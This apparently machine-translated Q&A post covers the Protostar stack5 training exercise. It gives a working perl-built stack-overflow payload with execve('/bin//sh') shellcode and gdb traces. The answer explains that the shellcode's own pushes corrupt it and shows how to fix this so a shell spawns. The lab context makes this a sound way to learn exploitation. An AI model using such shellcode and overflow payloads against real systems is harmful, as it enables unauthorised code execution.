Shellcode没有正确执行

Question

我想解决Protostar stack5。 这是一个solution。 它把shellcode后的返回地址，我试图把它放在数组中。 我已经尝试了shellcode，它的工作原理。

似乎一切正常，执行跳转到shellcode，但在shellcode结束后出现分段错误，并且没有生成shell。我不知道为什么，在gdb并非所有shellcode指令都正确显示。 例如在0xbffff690应该是mov %esp,%ecx而不是cwtl。也许这是问题？这是为什么发生？

编辑：由于阵列地址在gdb以外启动时会稍有不同，所以我们需要一个nop底座。所以我的方法可能无法工作，因为数组大小对于这个太小。但是我仍然想知道为什么shellcode的末尾在gdb中被错误地解释。

perl -e 'print "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "A"x21 . "\x60\xf6\xff\xbf"' > /tmp/o2 


user@protostar:/opt/protostar/bin$ gdb -q stack5 
Reading symbols from /opt/protostar/bin/stack5...done. 
(gdb) disas main 
Dump of assembler code for function main: 
0x080483c4 <main+0>: push %ebp 
0x080483c5 <main+1>: mov %esp,%ebp 
0x080483c7 <main+3>: and $0xfffffff0,%esp 
0x080483ca <main+6>: sub $0x50,%esp 
0x080483cd <main+9>: lea 0x10(%esp),%eax 
0x080483d1 <main+13>: mov %eax,(%esp) 
0x080483d4 <main+16>: call 0x80482e8 <gets@plt> 
0x080483d9 <main+21>: leave 
0x080483da <main+22>: ret  
End of assembler dump. 
(gdb) b *0x080483da 
Breakpoint 1 at 0x80483da: file stack5/stack5.c, line 11. 
(gdb) r < /tmp/o2 
Starting program: /opt/protostar/bin/stack5 < /tmp/o2 

Breakpoint 1, 0x080483da in main (argc=Cannot access memory at address 0x41414149 
) at stack5/stack5.c:11 
11 stack5/stack5.c: No such file or directory. 
    in stack5/stack5.c 
(gdb) b *0xbffff660 
Breakpoint 2 at 0xbffff660 
(gdb) c 
Continuing. 

Breakpoint 2, 0xbffff660 in ??() 
(gdb) display/i $pc 
1: x/i $pc 
0xbffff660: xor %eax,%eax 
(gdb) ni 
0xbffff662 in ??() 
1: x/i $pc 
0xbffff662: xor %ebx,%ebx 
(gdb) 
0xbffff664 in ??() 
1: x/i $pc 
0xbffff664: mov $0x6,%al 
(gdb) 
0xbffff666 in ??() 
1: x/i $pc 
0xbffff666: int $0x80 
(gdb) 
0xbffff668 in ??() 
1: x/i $pc 
0xbffff668: push %ebx 
(gdb) 
0xbffff669 in ??() 
1: x/i $pc 
0xbffff669: push $0x7974742f 
(gdb) 
0xbffff66e in ??() 
1: x/i $pc 
0xbffff66e: push $0x7665642f 
(gdb) 
0xbffff673 in ??() 
1: x/i $pc 
0xbffff673: mov %esp,%ebx 
(gdb) 
0xbffff675 in ??() 
1: x/i $pc 
0xbffff675: xor %ecx,%ecx 
(gdb) 
0xbffff677 in ??() 
1: x/i $pc 
0xbffff677: mov $0x2712,%cx 
(gdb) 
0xbffff67b in ??() 
1: x/i $pc 
0xbffff67b: mov $0x5,%al 
(gdb) 
0xbffff67d in ??() 
1: x/i $pc 
0xbffff67d: int $0x80 
(gdb) 
0xbffff67f in ??() 
1: x/i $pc 
0xbffff67f: xor %eax,%eax 
(gdb) 
0xbffff681 in ??() 
1: x/i $pc 
0xbffff681: push %eax 
(gdb) 
0xbffff682 in ??() 
1: x/i $pc 
0xbffff682: push $0x68732f2f 
(gdb) 
0xbffff687 in ??() 
1: x/i $pc 
0xbffff687: push $0x6e69622f 
(gdb) 
0xbffff68c in ??() 
1: x/i $pc 
0xbffff68c: mov %esp,%ebx 
(gdb) 
0xbffff68e in ??() 
1: x/i $pc 
0xbffff68e: push %eax 
(gdb) 
0xbffff68f in ??() 
1: x/i $pc 
0xbffff68f: push %ebx 
(gdb) 
0xbffff690 in ??() 
1: x/i $pc 
0xbffff690: cwtl 
(gdb) 
0xbffff691 in ??() 
1: x/i $pc 
0xbffff691: idiv %bh 
(gdb) 
0xbffff693 in ??() 
1: x/i $pc 
0xbffff693: mov $0x0,%edi 
(gdb) 
0xbffff698 in ??() 
1: x/i $pc 
0xbffff698: das  
(gdb) 
0xbffff699 in ??() 
1: x/i $pc 
0xbffff699: bound %ebp,0x6e(%ecx) 
(gdb) 

Program received signal SIGSEGV, Segmentation fault. 
0xbffff699 in ??() 
1: x/i $pc 
0xbffff699: bound %ebp,0x6e(%ecx) 

Answer 1

有趣的问题。答案是：您的堆栈溢出中存在堆栈溢出。

在我的系统中，主要的拆卸是一个稍微不同的地址：

(gdb) disas 
Dump of assembler code for function main: 
    0x0804841d <+0>:  push %ebp 
    0x0804841e <+1>:  mov %esp,%ebp 
    0x08048420 <+3>:  and $0xfffffff0,%esp 
    0x08048423 <+6>:  sub $0x50,%esp 
    0x08048426 <+9>:  lea 0x10(%esp),%eax 
    0x0804842a <+13>: mov %eax,(%esp) 
    0x0804842d <+16>: call 0x80482f0 <gets@plt> 
    0x08048432 <+21>: leave 
    0x08048433 <+22>: ret 
End of assembler dump. 

堆栈地址也不同：当0x0804841d停止返回地址0xffffcedc，这意味着，到时候我达到gets$eax的值是0xffffce90，我需要相应地调整漏洞利用代码。

然后我在*0x08048433设置断点，一旦我达到它执行以下命令：

(gdb) display/23i 0xffffce90 
(gdb) stepi 

这是我后来看到：

0xffffce90 in ??() 
1: x/23i 0xffffce90 
=> 0xffffce90: xor %eax,%eax 
    0xffffce92: xor %ebx,%ebx 
    0xffffce94: mov $0x6,%al 
    0xffffce96: int $0x80 
    0xffffce98: push %ebx 
    0xffffce99: push $0x7974742f 
    0xffffce9e: push $0x7665642f 
    0xffffcea3: mov %esp,%ebx 
    0xffffcea5: xor %ecx,%ecx 
    0xffffcea7: mov $0x2712,%cx 
    0xffffceab: mov $0x5,%al 
    0xffffcead: int $0x80 
    0xffffceaf: xor %eax,%eax 
    0xffffceb1: push %eax 
    0xffffceb2: push $0x68732f2f 
    0xffffceb7: push $0x6e69622f 
    0xffffcebc: mov %esp,%ebx 
    0xffffcebe: push %eax 
    0xffffcebf: push %ebx 
    0xffffcec0: mov %esp,%ecx 
    0xffffcec2: cltd 
    0xffffcec3: mov $0xb,%al 
    0xffffcec5: int $0x80 
(gdb) # I press Enter here to repeat stepi 
0xffffce92 in ??() 
1: x/23i 0xffffce90 
    0xffffce90: xor %eax,%eax 
=> 0xffffce92: xor %ebx,%ebx 
    0xffffce94: mov $0x6,%al 
    0xffffce96: int $0x80 
    0xffffce98: push %ebx 
    0xffffce99: push $0x7974742f 
    0xffffce9e: push $0x7665642f 
    0xffffcea3: mov %esp,%ebx 
    0xffffcea5: xor %ecx,%ecx 
    0xffffcea7: mov $0x2712,%cx 
    0xffffceab: mov $0x5,%al 
    0xffffcead: int $0x80 
    0xffffceaf: xor %eax,%eax 
    0xffffceb1: push %eax 
    0xffffceb2: push $0x68732f2f 
    0xffffceb7: push $0x6e69622f 
    0xffffcebc: mov %esp,%ebx 
    0xffffcebe: push %eax 
    0xffffcebf: push %ebx 
    0xffffcec0: mov %esp,%ecx 
    0xffffcec2: cltd 
    0xffffcec3: mov $0xb,%al 
    0xffffcec5: int $0x80 
(gdb) 
0xffffce94 in ??() 
1: x/23i 0xffffce90 
    0xffffce90: xor %eax,%eax 
    0xffffce92: xor %ebx,%ebx 
=> 0xffffce94: mov $0x6,%al 
    0xffffce96: int $0x80 
    0xffffce98: push %ebx 
    0xffffce99: push $0x7974742f 
    0xffffce9e: push $0x7665642f 
    0xffffcea3: mov %esp,%ebx 
    0xffffcea5: xor %ecx,%ecx 
    0xffffcea7: mov $0x2712,%cx 
    0xffffceab: mov $0x5,%al 
    0xffffcead: int $0x80 
    0xffffceaf: xor %eax,%eax 
    0xffffceb1: push %eax 
    0xffffceb2: push $0x68732f2f 
    0xffffceb7: push $0x6e69622f 
    0xffffcebc: mov %esp,%ebx 
    0xffffcebe: push %eax 
    0xffffcebf: push %ebx 
    0xffffcec0: mov %esp,%ecx 
    0xffffcec2: cltd 
    0xffffcec3: mov $0xb,%al 
    0xffffcec5: int $0x80 
(gdb) 

到目前为止，一切都很好地出发。但要注意，当我们在它到达0xffffcebe和stepi会发生什么：

0xffffcebf in ??() 
1: x/23i 0xffffce90 
    0xffffce90: xor %eax,%eax 
    0xffffce92: xor %ebx,%ebx 
    0xffffce94: mov $0x6,%al 
    0xffffce96: int $0x80 
    0xffffce98: push %ebx 
    0xffffce99: push $0x7974742f 
    0xffffce9e: push $0x7665642f 
    0xffffcea3: mov %esp,%ebx 
    0xffffcea5: xor %ecx,%ecx 
    0xffffcea7: mov $0x2712,%cx 
    0xffffceab: mov $0x5,%al 
    0xffffcead: int $0x80 
    0xffffceaf: xor %eax,%eax 
    0xffffceb1: push %eax 
    0xffffceb2: push $0x68732f2f 
    0xffffceb7: push $0x6e69622f 
    0xffffcebc: mov %esp,%ebx 
    0xffffcebe: push %eax 
=> 0xffffcebf: push %ebx 
    0xffffcec0: mov %esp,%ecx 
    0xffffcec2: cltd 
    0xffffcec3: mov $0x0,%al 
    0xffffcec5: add %al,(%eax) 

刚刚执行push改写曾经是在0xffffcec5用别的东西（即$eax内容）的int80。这是因为我们正在执行堆栈上的指令，同时push将值写入同一个堆栈！

另一个stepi，我看到：

(gdb) stepi 
0xffffcec0 in ??() 
1: x/23i 0xffffce90 
    0xffffce90: xor %eax,%eax 
    0xffffce92: xor %ebx,%ebx 
    0xffffce94: mov $0x6,%al 
    0xffffce96: int $0x80 
    0xffffce98: push %ebx 
    0xffffce99: push $0x7974742f 
    0xffffce9e: push $0x7665642f 
    0xffffcea3: mov %esp,%ebx 
    0xffffcea5: xor %ecx,%ecx 
    0xffffcea7: mov $0x2712,%cx 
    0xffffceab: mov $0x5,%al 
    0xffffcead: int $0x80 
    0xffffceaf: xor %eax,%eax 
    0xffffceb1: push %eax 
    0xffffceb2: push $0x68732f2f 
    0xffffceb7: push $0x6e69622f 
    0xffffcebc: mov %esp,%ebx 
    0xffffcebe: push %eax 
    0xffffcebf: push %ebx 
=> 0xffffcec0: enter $0xffce,$0xff 
    0xffffcec4: add %al,(%eax) 
    0xffffcec6: add %al,(%eax) 
    0xffffcec8: das 

而接下来stepi原因SIGSEGV：

(gdb) stepi 
Program received signal SIGSEGV, Segmentation fault. 

那么，有什么解决办法？

当我们在0xffffce90输入代码时，我们的堆栈指向0xffffcee0，即只有80个字节超过了shellcode。我们的shellcode长度是54个字节。因此，在我们开始破坏我们的shellcode之前，我们可以在堆栈上最多推送6个单词。

当前shellcode推送8个单词，第7次和第8次推送时自行破坏。 shellcode需要弹出某些单词（例如在0xffffcead的第一个系统调用之后添加pop %eax），或者使用例如扩展堆栈来扩展堆栈。输入时为add $0x80,%esp，所以在shellcode结束和栈顶之间有足够的空间。

我用了后者，和它的工作：

(gdb) c 
Continuing. 
process 21439 is executing new program: /bin/bash